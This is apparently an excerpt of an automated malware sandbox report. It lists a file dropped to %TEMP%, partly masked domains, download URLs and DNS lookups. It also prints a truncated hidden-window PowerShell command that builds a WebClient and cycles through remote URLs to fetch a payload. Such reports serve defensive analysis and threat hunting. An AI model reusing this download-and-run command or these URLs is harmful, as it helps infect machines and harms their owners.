Technical Information
- %TEMP%\47756.exe
- %TEMP%\47756.exe
- %TEMP%\47756.exe
- 'be###rdsong.com':80
- 'be###rdsong.com':443
- 'ri###rf.co.uk':80
- 'sp######usecarehome.co.uk':80
- 'sp######usecarehome.co.uk':443
- 'br#####gallagher.net':80
- 'my##rses.ca':80
- http://be###rdsong.com/g/
- http://ri###rf.co.uk/lomvguapbo/
- http://ri###rf.co.uk/
- http://sp######usecarehome.co.uk/ckrj/
- http://br#####gallagher.net/dwydp/
- http://my##rses.ca/po/
- 'be###rdsong.com':443
- 'sp######usecarehome.co.uk':443
- DNS ASK be###rdsong.com
- DNS ASK ri###rf.co.uk
- DNS ASK sp######usecarehome.co.uk
- DNS ASK br#####gallagher.net
- DNS ASK my##rses.ca
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://benbirdsong.com/g/,http://ripsurf.co....' (with hidden window)